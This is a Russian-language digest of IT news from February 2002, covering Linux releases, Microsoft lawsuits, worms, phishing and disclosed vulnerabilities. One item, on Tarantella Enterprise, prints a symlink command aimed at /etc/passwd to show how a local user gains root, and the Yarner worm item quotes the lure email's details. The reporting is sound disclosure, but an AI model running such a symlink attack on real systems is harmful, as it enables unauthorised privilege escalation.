24/02/2002 В интернете становится тесно.В опубликованном в четверг заявлении ЕК говорится, что руководители европейских государств и капитаны бизнеса должны поднапрячься и перевести инфраструктуру интернета с современной версии IP-протокола IPv4 на новую IPv6, чтобы создать свободное место для наплыва беспроводных устройств, наводняющих Сеть. Каждому устройству с доступом к интернету, будь то ПК, PDA или сотовый телефон, нужно выделить IP-адрес. Переход на IPv6 помог бы решить проблему растущего спроса на IP-адреса, так как эта технология позволяет обслужить больше адресов, чем существующая система. "Без этого интернет неизбежно рухнет под гигантским давлением новых пользователей и растущего трафика, и важные для конкурентоспособности Европы инновации будут сорваны", говорится в заявлении ЕК. Подробности - http://zdnet.ru/?ID=182274
23/02/2002 DMCA снова в действии.
Под давлением адвокатов компании Blizzard, разработчика игр Diablo II и Starcraft, был закрыт сайт эмулятора сервера для онлайновых многопользовательских сражений в эти игры, аналога Battle.Net, официального сервера Blizzard. Опираясь на положения DMCA, адвокаты направили письмо хостинг-провайдеру сайта, обвиняя разработчиков в пособничестве пиратам, так как для игры на сервере на основе bnetd не требуется ключ от официально купленной версии игры. Источник - http://www.linuxcenter.ru
23/02/2002 Новая статья посвященная построению кластеров под управлением Linux на it-director.com.
Автор описывает принципы работы кластеров, преимущества подобных систем, приводит конкретные примеры. Статья - http://www.it-director.com/article.php?id=2625
23/02/2002 Выход Suse 8.0.
Неожиданный выход новой версии популярного дистрибутива. Ядро 2.4.17, KDE 3. Подробности - http://www.linux.org.ru/
23/02/2002 Устранена проблема в системе Tripod.
Компания Lycos выпустила патч, закрывающий уязвимость в Tripod - одном из крупнейших провайдеров домашних страниц. Проблема состоит в том, что Tripod производит регистрацию поэтапно: когда пользователь попадает на страницу активации, служба не проверяет пароль, если он был подтвержден ранее. Брешь была обнаружена сотрудниками компании Interrorem, специализирующейся на проблемах безопасности. В течение суток уязвимость в системе была ликвидирована. Источник - http://www.bezpeka.com/news/
23/02/2002 Уязвимость серверов Tarantella Enterprise.
В серверах приложений Tarantella Enterprise обнаружена уязвимость, позволяющая локальному пользователю получить права root. Заключается проблема в том, что во время инсталляции некоторого ПО, сервер создает временный файл /tmp/spinning с правами на чтение и на запись для всех. Локальный пользователь может создать символическую ссылку с таким же именем, указывающую на какой-либо критичный для системы файл (например ln -s /etc/passwd /tmp/spinning). После того, как пользователь root завершит инсталляцию, файл, на который указывает символическая ссылка, останется доступным для всех на запись, что дает локальному пользователю возможность его модифицировать, и как следствие получить права root. Компания Tarantella пообещала решить эту проблему в следующем релизе. Источник - http://www.bezpeka.com/news/
22/02/2002 Разработчики Gnome выпустили очередную бету 2.0, посвященную "круглой дате".
20 февраля разработчики Gnome, менеджера рабочего стола для Linux, объявили о выпуске очередной бета-версии 2.0 пакета программ. Выпуск очередной бета-версии программы посвящен "математической" круглой дате - сочетание цифр "20.02.2002" представляет собой палиндром, то есть одинаково "читается" слева направо и справа налево. Как сообщают разработчики, данный релиз был основательно протестирован и не должен содержать критических ошибок." Источник - http://www.linux.org.ru/
22/02/2002 Уязвимости в Squid.
Обнаружены три ошибки в широко распространенном proxy-сервере squid: - Утечка памяти в реализации SNMP, что может быть использовано с целью организации отказов в обслуживании в случае, если включен (выключенный по умолчанию) SNMP-интерфейс в squid. - Переполнение буфера в обработке URL специального вида, что может быть использовано с целью организации отказов в обслуживании и нарушения доступа. - Невозможность выключения HTCP-интерфейса." Источник - http://www.linux.ru.net
22/02/2002 Выход GCC 3.0.4.
Очередная версия популярного компилятора под Linux. Множество исправлений и изменения в оптимизаторе. Подробности - http://gcc.gnu.org/gcc-3.0/features.html
22/02/2002 Обманутые клиенты подают в суд на компанию PayPal.
Бывшие пользователи системы электронных платежей PayPal подали совместный иск на компанию, обвиняя ее в незаконном прекращении доступа некоторых пользователей к собственным учетным записям и счетам. Обманутые клиенты требуют возмещения убытков. Согласно правилам системы PayPal, доступ к счетам закрывается в случае появления подозрений в незаконной деятельности. Даже если в случае нарушения закона фигурирует небольшая сумма, клиент теряет доступ ко всем деньгам на счете PayPal. Источник - http://www.compulenta.ru/news/2002/2/22/25917/
22/02/2002 Выпущен очередной патч для Internet Explorer 6.
Компания Microsoft выпустила очередное обновление для браузера Internet Explorer, решающее уязвимость в программе, которая может привести к неавторизованному доступу к файлам на жестком диске. Данная уязвимость была найдена в браузере Internet Explorer шестой версии. Подробности - http://www.compulenta.ru/news/2002/2/22/25929/
22/02/2002 В сети начался массовый взлом и кража номеров ICQ.
Новостным сайтом The Register были получены доказательства массовой атаки на сеть обмена мгновенными сообщениями ICQ. Такие данные не подтверждены ни компанией AOL, владельцем сети, ни экспертами по безопасности. Однако, The Register получил несколько писем от пользователей, которые потеряли собственные номера ICQ, обнаружив, что в их учетной записи был изменен пароль, а действующий e-mail заменен на "uin@deathrow.com". Поиск в базе данных ICQ WhitePages выдал сотни учетных записей ICQ с таким e-mail, что может стать поводом для подозрения в наличии факта массового взлома сети интернет-пейджера. Подробности - http://www.compulenta.ru/news/2002/2/22/25926/
21/02/2002 Linux Kernel 2.5.5.
Очередная версия development ветви ядра Linux. Скачать - http://www.ru.kernel.org/pub/linux/kernel/v2.5/linux-2.5.5.tar.gz
21/02/2002 Компания Lindows подала в суд на Microsoft.
Компания Lindows, которая известна своим дистрибутивом "с человеческим лицом", подала иск в суд на торговую марку Windows. Подробности - http://www.cnews.ru/news/comp/2002/02/20/20020220111518.shtml Источник - http://www.linux.ru.net
21/02/2002 DoS-уязвимость коммутаторов NETGEAR.
В коммутаторах NETGEAR RM-356 обнаружена DoS-уязвимость. Удаленный пользователь может вызвать сбой устройства посредством сканирования UDP-портов. Решение проблемы на данный момент не найдено. Подробности - http://www.bezpeka.com/news/index.html#18-02-02
21/02/2002 В кумулятивном патче для IE обнаружены проблемы.
Недавно выпущенный компанией Microsoft кумулятивный патч для Internet Explorer 5.01, 5.5 и 6 некорректно работает со страницами, содержащими VBScript с директивой "execScript". Ошибка вызывает зависание браузера. Представители Microsoft заверили, что обнаруженные ошибки никак не отражаются на безопасности, а влияют только на стабильность работы браузера. Сейчас ведется работа над новым патчем, в случае возникновения проблем пользователям рекомендуется перезапустить программу, а владельцам сайтов изменить код так, чтобы не использовать директиву "execScript". В ближайшее время необходимые инструкции для этого будут помещены в Microsoft Knowledge Base. Источник - http://www.bezpeka.com/news/index.html#19-02-01
21/02/2002 Конгреcсмен предостерег Госдуму от подслушивания Интернета .
Сразу после приезда в Россию глава делегации Конгресса США Роберт Гудлатт подверг критике законопроекты российской Госдумы, предполагающие государственный надзор за Интернетом, а также доступ государства к зашифрованным документам в сфере интернет-бизнеса. Подробности - http://www.newsbytes.com/news/02/174604.html
21/02/2002 Жулики выманивают пароли ICQ через почту .
По Сети вновь начало путешествовать послание с требованием немедленно подтвердить статус пользователя ICQ, для чего предлагается послать отправителям свой логин и пароль. В поле "от кого" значится ICQ.com. Однако это сообщение - не более, чем попытка жуликов получить доступ к чужому аккаунту ICQ. Подробности - http://www.netoscope.ru/news/2002/02/19/4830.html
21/02/2002 В Англии открылась школа охотников за хакерами .
Калифорнийская компания Guidance Software в среду открыла свою первую в Европе школу специалистов по выслеживанию хакеров. В Америке на курсах Guidance уже прошли подготовку тысячи сыщиков Интерпола, агентов ФБР и сотрудников собственных служб безопасности корпораций. В отличие от обучения классических специалистов по компьютерной безопасности, курсы Guidance ориентированы в основном не на защиту от хакерских атак, а специализируются на методах поиска и отлова самих хакеров уже по факту нападения. Выпускники курсов получают государственные сертификаты профессионалов в правоохранительной деятельности. Помимо обучения компания выпускает всевозможные шпионские устройства и программы, помогающие находить следы взломщиков и выуживать информацию о них из различных источников. Подробности - http://www.netoscope.ru/news/2002/02/20/4840.html
21/02/2002 Windows Media Player 8 ведет учет всем проигранным на нем файлам.
Как стало известно, Windows Media Player 8, мультимедийный проигрыватель, бесплатно поставляющийся вместе с операционной системой Windows XP, содержит шпионские программы. Во всяком случае, совершенно точно, что он запоминает сведения обо всех проигрываемых на нем файлах. Когда пользователь, например, проигрывает CD, Media Player загружает с определенного сайта Microsoft, название и самого диска, и всех записанных на нем песен. Информация хранится в маленьком файле на каждом компьютере с установленным WM Player восьмой версии. Так же обстоит дело и с DVD. После запроса со сторона Associated Press, Microsoft объявил о том, что впредь будет информировать пользователей об этой характерной черте Media Player. Ранее пользователи лишь уведомлялись о том, что наименования записей на DVD и CD скачиваются с определенного сайта, но нигде не сообщалось о том, что список проигранных файлов сохраняется на компьютере. Теперь пользователи будут об этом олповещаться, однако Microsoft не сообщает о том, как можно удалить или отредактировать этот файл. Более подробно - http://www.compulenta.ru/news/2002/2/21/25851/
21/02/2002 Исследователи в Университете Мэриленда обнаружили две новые дыры в стандарте 802.11.
Новый набор средств для повышения безопасности беспроводных сетей, работающих по стандарту 802.11, сам подвержен серьезным уязвимостям. Об этом сообщили исследователи из Университета Мэриленда. В частности, профессора Уильям Арбо и Арунеш Мишра объявили о двух главных проблемах. В первом случае хакер может послать клиенту во время установки связи фальшивое сообщение "Сеанс связи прерван", исходящее якобы от узла соединения. Клиент начинает подсоединяться повторно, в то время как прежний узел соединения считает, что сеанс связи по-прежнему активен, и хакер может им пользоваться. Второй способ атаки, который мэрилендские исследователи назвали "посредник", также состоит в том, что хакер маскируется под узел соединения, ретранслируя пакеты данных между настоящим узлом и клиентом, заодно просматривая их содержимое, спокойно обходя все средства защиты высшего уровня и делая механизм аутентификации фактически бесполезным. В выпущенном Арбо и Мишрой документе говорится, что стандарт IEEE 802.1X необходимо модифицировать таким образом, чтобы стала возможной симметричная аутентификация: чтобы и клиент, и узел связи проверяли друг друга. Необходимо усовершенствовать и средства проверки узла связи. Без этого стандарты 802.1Х и 802.11 должного уровня безопасности обеспечить не смогут. Подробности - http://www.compulenta.ru/news/2002/2/21/25849/
21/02/2002 Microsoft работает на сканером для поиска уязвимостей в программах.
В последнее время корпорация Microsoft стала уделять повышенное внимание проблеме безопасности своих продуктов. Отныне поиск ошибок и уязвимых мест в программах стал наиважнейшей задачей программистов компании. Очередным шагом на пути усиления безопасности должна стать программа, способная самостоятельно вести поиск уязвимых мест в системе. Над созданием этой программы уже трудятся программисты Microsoft, а ее ранняя версия была представлена на конференции RSA 2002, проходящей в эти дни в Сан-Хосе. Сканер уязвимостей от Microsoft, получивший название Baseline Security Advisor, после установки сканирует ОС и приложения на предмет наличия в них всех необходимых заплаток и обновлений, предупреждает о недостаточно надежных паролях и указывает на потенциально уязвимые места отдельных программ. При этом Baseline Security Advisor, в отличие от других подобных сканеров, выступает не в роли хакера, пытающегося взломать компьютер, а в роли администратора, настраивающего систему на максимальную безопасность путем изменения ее установок. Для поиска дыр сканер от Microsoft скачивает из интернета базу данных в формате XML, размер которой на сегодняшний день составляет около 700 кб. Саму программу можно будет бесплатно скачать с сайта Microsoft уже в марте этого года. Источник - http://news.com.com/
20/02/2002 Tinfoil Hat Linux: версия для параноиков.
Tinfoil Hat Linux - это дистрибутив, предназначенный для защиты документов с максимальным уровнем безопасности, с электронной подписью и шифрованием. Загрузочный образ флоппи-диска обладает большим количеством функций по защите: ввод пароля с помощью выбора в стиле видеоигры для защиты от клавиатурных закладок, считывающих последовательность нажатых клавиш, уменьшение контрастности монитора, чтобы затруднить задачу чьим-то пытливым глазам и камерам Подробности - http://tinfoilhat.cultists.net/
20/02/2002 Книга Линуса Торвальдса и Девида Даймонда.
В русском переводе вышла книга Линуса Торвальдса и Девида Даймонда "Just for FUN. Рассказ нечаянного революционера". Линус рассказывает об истории развития Linux и планах на будкщее, а также кое-что из своей биографии. Подробности - http://www.bolero.ru/catalog/book/pages/pages-2192898.html
20/02/2002 У нас новая статья: Настройка почтового сервиса на основе Sendmail..
В этом очерке рассказывается о методике построения почтового сервера для малых компаний. За основу почтового сервера взят широко известный sendmail. Статья предназначена для начинающих администраторов, но каждый обязательно найдет в ней что-то полезное для себя. Так, автор попытался охватить наиболее серьезные проблемы настройки, которые могут возникнуть практически у любого администратора. Ознакомиться: http://www.uinc.ru/articles/31/index.shtml
19/02/2002 Ненадежность прокси-серверов SafeWeb.
Эксперт Бостонского Университета Дэвид Мартин (David Martin) и сотрудник фонда Privacy Foundation Эндрю Шульман (Andrew Shulman) опубликовали отчет, согласно которому пользователи прокси-серверов компании SafeWeb защищены менее чем любой среднестатистический пользователь Сети, поскольку узнать о его онлайновых предпочтениях можно очень легко. Легкость эта обеспечивается тем, как SafeWeb взаимодействует со сценариями JavaScript, - вместо его отключения, что почти всегда приводит к нарушению функциональности сайта, используется программа перезаписи сценариев в собственные программы прокси-сервера, цель которой - сделать недоступной личную информацию о клиенте. Пользователь может использовать эту функцию в двух режимах - обычном и запрещающим исполнение каких-либо сценариев JavaScript на стороне клиента. Подробности - http://www.bezpeka.com/news/index.html#19-02-04
19/02/2002 Debian Woody практически готов.
По информации Энтони Таунса (менеджер по версиям), Woody практически готов. Почти все критичные для релиза ошибки (кроме трех) исправлены, а команда по исправлению ошибок работает в обычном режиме. Но, кроме хороших новостей, есть и плохие: все это означает, что вскоре мы выпустим новый релиз, а сотни менее значимых пакетов с критичными для релиза ошибками (например, bugzilla, craft, crossfire (и клиентская, и серверная части), epic4, fvwm95, gmc, gnome-admin, да и, скорее всего, kdepim, moon-lander, tkdesk, wine и xosview) выпадут из процесса тестирования. Проверяйте те модули, которые вам необходимы, и исправляйте в них ошибки, пока еше не поздно. Источник - http://www.linux.org.ru/jump-message.jsp?msgid=159659
19/02/2002 Новый червь Yarner замещает Notepad.exe своей копией и может стереть все на жестком диске.
"Лаборатория Касперского" сообщает об обнаружении опасного червя Yarner, распространяющегося в виде файлов, прикрепленных к электронным письмам. Червяк является Windows-приложением, и имеет весьма солидные для вредоносной программы размеры - 434 Кбайта. Написан на Delphi. Зараженные письма содержат в поле "From:" либо настоящий адрес отправителя, либо ложный адрес: Trojaner-Info [%TrueEmail%] или Trojaner-Info [webmaster@trojaner-info.de] Имя вложения: yawsetup.exe Тема письма: Trojaner-Info Newsletter и указание даты. В теле письма - длинный текст на немецком, начинающийся со слов: Hallo ! Willkomen zur neuesten Newsletter-Ausgabe der Webseite Trojaner-Info.de. Hier die Themen im Ueberblick: 1. YAW 2.0 - Unser Dialerwarner in neuer Version ************************************ 1. YAW 2.0 - Unser Dialerwarner in neuer Version Viele haben ihn und... Червь активизируется только если пользователь сам запускает зараженные файл (при двойном щелчке на вложении). Затем червь инсталлирует себя в систему и запускает процедуры своего распространения. Подробности - http://www.compulenta.ru/news/2002/2/19/25771/
19/02/2002 Интернет-рупор чеченских сепаратистов запускает собственный рейтинг и готовит поисковую систему для рекламы.
Помнится в своё время на хакзоне шёл разговор о сервере kavkaz.org. Вот новость от "них". Чеченское независимое международное исламское интернет-агентство Кавказ-Центр", несмотря на охоту на него спецслужб и ПАТРИОТИЧКИ НАСТРОЕННЫХ ХАКЕРОВ (выделено составителем новостей), продолжает работать и даже открывает новый интернет-рейтинг KAVKAZ TOP100. "C учётом обширной аудитории сайта kavkaz.org участники проекта KavkazTOP 100 могут значительно поднять популярность своих интернет ресурсов", - говорится в разосланном по российским интернет-СМИ пресс-релизе. Сообщается также о подготовке специальной системы глобального интернет-поиска, который позволит владельцам сайтов использовать каталоги ведущих интернет-поисковиков в рекламных целях. При распространении рекламной информации о том или ином ресурсе приоритет будетотдаваться участникам проекта KavkazTOP 100. На самом "Кавказ-Центре" рекламы нет и почти наверняка не будет - у поддерживающих этот сайт достаточно средств, чтобы не заниматься привлечением рекламы на свой ресурс. Зато, видимо, хозяева "Кавказ-Центра" желают привлечь к себе насколько возможно большее внимание. Как сказано - правда, о свиньях - в романе Фазиля Искандера "Сандро из Чегема", "Я их сам не ем, я только неверным продаю!" От себя хотелось бы заметить, что изначально в "титрах" создателей сайта фигурировали фамилии далеко не чеченские, ди сам сайт хостится в Америке. Подробности - http://www.compulenta.ru/news/2002/2/19/25745/
19/02/2002 Самое страшное в СПАМе - это борьба с ним.
Cобственно-и говорить нечего. Спаммеры борятся с антиспаммерами. Обе стороны приводят свои доводы. Вернее, здесь-доводы "пострадавшей" стороны. Ссылка - http://www.osios.org/
19/02/2002 WinXP подвержен старой уязвимости типа SYN-flood.
В списке рассылки BUGTRAQ прошла информация от NtWaK0, что ХР в дефолтной инсталляции подвержен атаке очень напоминающей по поведению старую атаку типа СИН-флуд. Дело в том, что при Def. инсталляции на ХР открывается порт 445. При посылке определённого количества пакетов на этот порт с установленным флагом SYN WinXP приходит в "неработоспособной" состояние, что расценивается, как DoS. Автор приводит пример содержимого пакета. Источник - http://www.securityfocus.com
18/02/2002 Кодак судится с Sun Microsystems по поводу Java.
Компания Eastman Kodak подала в суд на Sun Microsystems по поводу нарушения патента на некие технологии, используемые в языке программирования Java. Подробности - http://www.linuxcenter.ru:8081/news/#896
18/02/2002 В Австралии арестован 21-летний хакер, по обвинению во взломе серверов интернет-провайдера.
Полиция Австралии, по обвинению в незаконном проникновении в компьютерные системы интернет-провайдера Optus, арестовала 21-летнего хакера. Как сообщается в местных изданиях, хакер ранее был сотрудником Optus, хотя имя его пока не разглашается в интересах следствия. После установления факта взлома, полиция провела обыск в доме хакера, конфисковав компьютерное оборудование и документы обвиняемого. Как стало известно, расследование было инициировано самим провайдером, после обнаружения ряда изменений в собственной базе данных. Утверждается, что хакер изменил информацию в нескольких базах данных. Источник - http://www.compulenta.ru/news/2002/2/18/25715/
18/02/2002 Выпущена новая версия утилиты Spammer для Linux.
На сайте Freshmeat.org появилась информация о новой версии утилиты Spammer версии 0.2.1 для Linux. Spammer работает совместно с sendmail и используется для фильтрации несанкционированных сообщений (спама). Утилита Spammer отслеживает спам по IP-адресу отправителя в заголовке сообщения, сверяя его с имеющимися в базе данных. Получить дополнительную информацию по утилите можно на сайте автора программы Александра Миливойевича, там же можно загрузить текущую версию Spammer Подробности - http://freshmeat.net/redir/spammer/22064/url_homepage/
18/02/2002 SNMPing - сканер SNMP-уязвимостей .
Как известно, на прошлой неделе CERT опубликовал информационный бюллетень по безопасности, в котором утверждается об уязвимости сервиса SNMP во многих операционных системах. Всед за этим многие производители ОС выпустили обновления своих реализаций SNMP. 15 февраля SANS представила сканер SNMPing, тестирующий системы на наличие SNMP-уязвимостей. По утверждениям специалистов SANS, SNMPing представляет собой достаточно эффективный и универсальный инструмент для обнаружения уязвимых SNMP-сервисов, и единственным его недостатком является то, что работает он только под WinNT/2K. По умолчанию сканируется порт 161/UDP, однако в настройках можно указать и другой порт. Для получения ссылки на URL, с которого можно получить этот инструмент, необходимо послать пустое письмо по адресу - snmptool@sans.org Подробности - http://www.theregister.co.uk/content/5/24083.html На этой странице-отзывы - http://www.sans.org/snmp/tool.php
18/02/2002 Выпущены первые драйверы для NVIDIA nForce под Linux.
Компания NVIDIA выпустила первый релиз драйверов для своих чипсетов nForce 220D/420/420D под ОС Linux. Драйверы работоспособны при использовании ядер Mandrake 8.1, Red Hat 7.2 и Red Hat 7.2 (Kernel Upgrade). В драйверах реализована поддержка встроенного аудио и ethernet адаптера. IDE и USB контроллеры поддерживаются стандартными драйверами ОС. Поддержки Win-модема пока нет. Качать можно здесь - http://www.nvidia.com/view.asp?IO=nforce_linux_v1.0-0233
18/02/2002 Релиз браузера Mozilla 1.0 состоится в апреле 2002 года.
На сайте разработчиков открытого интернет-браузера Mozilla опубликована информация о ближайших планах по выпуску новых версий программы. На сакраментальный вопрос о точной дате выпуска долгожданной версии 1.0, увы, опять не дано точного ответа. Разработчики, видимо, не желая давать обязательства, которые потом могут оказаться неосуществимыми, оставили в текущем графике дату выпуска первого релиза под вопросом. Текущая версия Mozilla 0.9.8, по планам разработчиков, должна была выйти 25 января этого года, однако появилась позже - 4 февраля. Идеальная дата релиза 0.9.9, планируемая сообществом разработчиков, - 1 марта. Окончание работы над этой версией запланировано на 22 февраля. Тогда же, по имеющимся планам, начнется работа над Mozilla 1.0. Разработка продлится более месяца. 27 марта работы будут "заморожены", то есть, в коде программы будут производиться изменения, относящиеся только к исправлению ошибок. Окончание разработок запланировано на 29 марта. Дата финального выхода неизвестна. Таким образом, можно с большой долей уверенности говорить о выпуске Mozilla 1.0 в апреле этого года. Разработчики браузера, тем временем, готовят план по выпуску дальнейших версий программы с намеченными датами выпуска версий 1.1alpha - 10 мая, 1.1beta - 14 июня, релиза 1.1 - 3 июля 2002 года. Источник - http://www.mozilla.org
17/02/2002 Судья приказала Microsoft открыть исходники Windows.
Компания Microsoft откроет исходные коды операционной системы Windows девяти штатам, требующим более серьезных санкций против софтверного гиганта, нежели предложенных в соглашении с Министерством юстиции. Ранее прокуроры девяти штатов заявили, что им необходимо провести анализ кода Windows с целью на практике удостовериться в заявлениях Microsoft о невозможности создания "упрощенной" версии операционной системы без "монополизирующих" приложений, таких как Internet Explorer. Подробности - http://www.compulenta.ru/news/2002/2/17/25673/
17/02/2002 Стасус Debian 3.0 обновлен.
Управляющий выпусками Debian, Anthony Towns, обновил информацию о текущем состоянии подготовки в выпуску следующей стабильной версии Debian. Из хороших новостей - исправлены все критические ошибки, найденные в RC. Из плохих - предстоит испарвить еще кчу других ошибок.И других новостей: вышли загрузочные дискетты версии 3.0.19. Их предстоит тестировать. Также через несколько дней рекомендуется серьезно подойти к процессу обновления Potato до Woody. Источник - http://www.linux.ru.net/ Подробности - http://lists.debian.org/debian-devel-announce/2002/
17/02/2002 Изменения на Sourceforge.net .
По многочисленным девелоперским спискам рассылки циркулирует письмо владельцев SourceForge.net - крупнейшей системы организации разработки открытого ПО. Большинство разработчиков негативно относится к вводимым изменениям, однако многие справедливо отмечают, что трудно жаловаться на бесплатный сервис, тем более такой обширный и качественный. Источник - http://www.linuxcenter.ru:8081/news/ Изменения - http://sourceforge.net/docman/display_doc.php?docid=9269&group_id=1
17/02/2002 Цифровое пиратство: Америка против всех.
Международный альянс владельцев авторских прав подготовил для правительства США очередной "Отчет 301" со списком самых опасных стран-пиратов и мер по борьбе с ними. Статья 301 Торгового акта США подразумевает введение торговых санкций против государств, злостно нарушающих авторские права. Но количество таких стран с каждым годом только увеличивается. Подробности - http://www.netoscope.ru/theme/2002/02/15/4807.html
17/02/2002 Набор заплат для Internet Explorer оказался таким же дырявым, как и сам Explorer.
Комплект патчей Cumulative Patch for Internet Explorer от Microsoft для исправления дыр в браузере Internet Explorer 5.01 сам оказался с ошибками. Этот пакет был впервые выложен на сайт Windows Update 7 февраля, но через несколько часов его сняли - как выяснилось, программа содержала ошибки. Через неделю, 14 февраля та же набор заплаток появился опять. Однако, как сообщает Reuters, официальные заплаты Microsoft оказались уязвимы для тех же атак, от которых они должны были защищать. Подробности - http://www.lenta.ru/internet/2002/02/14/patch/
16/02/2002 Java 2 SDK 1.4.
Sun выпустил новую версию платформы Java 2. В этой версии появилась новая подсистема ввода-вывода, библиотека регулярных выражений, API для ведения log'ов, поддержка отключаемых runtime проверок (assert). В графической подсистеме AWT/Swing была улучшена поддержка Drag&Drop, быстрой графики Java2D, а так же появилось большое количество мелких улучшений. В Java 2 теперь входит доступный ранее пакет JSSE, содержищий реализацию основных криптографических алгоритмов и поддержку SSL. Источник - http://www.linux.org.ru/
16/02/2002 Выход Linux 2.4.18pre9-ac4.
Алан Кокс выпускает в свет новую pre-версию стабильной ветви ядра Linux. Скачать - patch-2.4.18-pre9-ac4.gz Источник - http://linuxtoday.com/news_story.php3?ltsn=2002-02-14-015-20-NW-KN
16/02/2002 Выход KDE 3 beta2.
Все ближе и ближе выход 3-ей версии популярного оконного менеджера для UNIX систем. Сегодняшний день ознаменовался выходом 2-й beta версии. Источник - http://news.com.com/2110-1040-838072.html Сайт KDE - http://www.kde.org
16/02/2002 Сравнение законов об авторском праве России и Украины.
На linux.kiev.ua выложена статья Федора Зуева, рассматривающая положение дел с законами об авторском праве в России и Украине. Источник - http://www.linux.ru.net Статья - http://www.linux.kiev.ua/materials/Laws-Comparison.html
15/02/2002 Обновление программы: Access Denied ScreenSaver 1.2.
Исправлен ряд недостатков: - выдача сообщений при смене пароля; - проблема с повторным запуском программы во время выполнения; - проблема с появлением "пустых" боксов в панели задач во время выполнения программы и после выполнения программы; - проблема с положением курсора на экране; Теперь меню ввода пароля исчезает через минуту простоя. Скачать: http://www.uinc.ru/scripts/load.cgi?files/agapov25/accessd.exe
15/02/2002 Из-за компьютерной ошибки британцы выплатили свыше 15 млн. фунтов лишних налогов.
Как сообщает интернет-издание Ananova налоговое ведомство Великобритании может получить свыше 15 млн. фунтов "лишних" налогов. Причиной этого стала ошибка при переносе налоговой базы из Национальной страховой компьютерной системы Nirs 2, работу которой обеспечивала компания Accenture в новую систему COP (Computerised Operation of PAYE). В ходе переноса данных, имевшего место еще в 1997 г. записи о более чем миллионе налогоплательщиков оказались заполненными не до конца. Источник - http://www.compulenta.ru/news/2002/2/15/25608/
15/02/2002 Выход Linux 2.5.5-pre1.
Вышел первый пререлиз нового нестабильного Linux ядра Linux 2.5.5-pre1. Данный релиз интересен тем, что это первое Linux ядро, в котором встроена ALSA. Источник - http://www.linux.ru Скачать - http://www.kernel.org/pub/linux/kernel/v2.5/testing/patch-2.5.5-pre1.bz2
15/02/2002 Компонент Microsoft Visual C++ .NET сам обладает той уязвимостью, против которой разрабатывался.
13 февраля на конференции VSLive в Сан-Франциско компания Microsoft представила .NET Framework и Visual Studio.NET. По замыслу Microsoft, архитектура .NET должна лечь в основу большинства программ для Windows. По словам Тома Баттона, одного из вице-президентов Microsoft, веб-сервисы .NET будут не менее надёжны, чем телефонная связь или электроснабжение сегодня. Тем не менее, уже спустя несколько часов после триумфального представления Visual Studio .NET начал разгораться новый скандал, в центре которого оказались Microsoft и вопросы компьютерной безопасности. Источник - http://www.compulenta.ru/news/2002/2/15/25598/
15/02/2002 Шеф Lindows обвиняет Microsoft в монополизме, защищая свою торговую марку.
В четверг исполнительный директор компании Lindows.com Майкл Робертсон опубликовал письмо, в котором содержится ответ на обвинения Microsoft в нарушении производителем дистрибутива на базе Linux прав софтверного гиганта на торговую марку Windows. Ранее Microsoft подала иск в суд на Lindows, обвинив последнюю в намеренном использовании сходной с Windows тороговой марки. Подробности - http://www.compulenta.ru/news/2002/2/15/25640/
15/02/2002 Удаленное получение прав root в Sun Solaris.
Компания Sun сообщила об обнаружении уязвимости в программе mail в ОС Sun Solaris, связанной с механизмом взаимодействия программ mail и sendmail. Проблема состоит том, что привилегированная программа может вызвать mail и передать в sendmail альтернативные конфигурационные настройки. Это позволяет локальному или удаленному пользователю несанкционированно повысить свои права. Ранее уже сообщалось о похожей проблеме в in.lpd, где удаленный пользователь мог посылать данные демону печати и вызывать запуск sendmail с альтернативным конфигурационным файлом и правами root. Патч, решающий проблему уже выпущен и доступен на сайте компании Sun. Источник - http://www.bezpeka.com/news/index.html#14-02-01
15/02/2002 Очередная уязвимость Outlook Express.
В рассылке Bugtraq появилась информация об очередной уязвимости в почтовом клиенте Microsoft Outlook Express. Проблема заключается в том, что Outlook некорректно обрабатывает заголовки сообщений. Вследствие чего, сообщение может быть составлено таким образом, что Outlook воспримет только часть заголовка письма, остальная часть будет интерпретирована как начало тела сообщения. Таким образом, Outlook может ошибочно обработать прикрепленный файл, который реально не содержится в теле письма. Проблема осложняется еще и тем, что Mail Transfer Agent (MTA) не обнаруживает этот файл. То есть, существует возможность проникновения вирусов внутрь корпоративной сети, минуя firewall. Уязвимы версии Microsoft Outlook Express 5.5 и 6.0. Источник - http://www.bezpeka.com/news/index.html#15-02-01
14/02/2002 Девять прокуроров требуют открыть исходники Windows .
Прокуроры девяти штатов, настаивающие на продолжении антимонопольного разбирательства против Microsoft, во вторник потребовали от корпорации открыть исходники ОС Windows. Как сообщает Reuters, прокуроры девяти штатов требуют от Microsoft раскрыть коды ОС в подтверждение того, что корпорация действительно не может осуществлять поставки урезанной версии Windows (например, без браузера, не разрушив при этом саму операционную систему. Подробности: http://netoscope.ru/news/2002/02/14/4790.html
14/02/2002 Крупнейшая кабельная сеть шпионила за клиентами.
Под давлением Конгресса и правозащитных организаций крупный национальный интернет-провайдер США Comcast в четверг пообещал, что больше не будет собирать данные о деятельности своих клиентов в Интернете. http://netoscope.ru/news/2002/02/14/4795.html
14/02/2002 США обещает отвечать бомбами на кибератаки.
Соединенные Штаты могут ответить на интернет-атаки зарубежных стран обычным военным ударом, заявил в среду советник Белого дома по технологиям Ричард Кларк, выступая на слушаниях Сената по теме "кибертерроризм". "Мы оставляем за собой право ответить на кибератаки любым подходящим способом: скрытой военной операцией, военными действиями или любым оружием, которое есть у президента", - заявил Кларк. При этом Кларк отказался уточнить, какого типа кибератака может привести к военным действиям. "Мы хотели бы намеренно оставить этот вопрос без ответа, как еще одно средство сдерживания", - заявил он. Как передает Associated Press, советник президента сообщил, что многие страны уже имеют специальные подразделения для ведения войны через Интернет. Среди названных им стран такого рода - Россия, Китай, Иран, Ирак и Северная Корея. Подробности: http://netoscope.ru/news/2002/02/14/4793.html
14/02/2002 Операционные системы будущего рождаются сейчас в лабораториях Microsoft, IBM и американских университетов.
В исследовательском подразделении Microsoft в настоящий момент ведется работа над проектом Farsite. Основные характеристики Farsite - это устойчивость к сбоям, самонастраиваемость и безопасность. Возможно, что идеи, лежащие в его основе, в будущем окажутся внедрены в реальные операционные системы. Конечная цель проекта "Farsite" - это создание в 2006 году кластера из 100 тысяч компьютеров, с общим объемом дисковой памяти в 10 петабайт (10 тысяч терабайт). Подробности: http://www.compulenta.ru/news/2002/2/14/25583/
14/02/2002 Новый червь CoolNow рассылается по почте и MSN Messenger и зазывает на заразные веб-сайты .
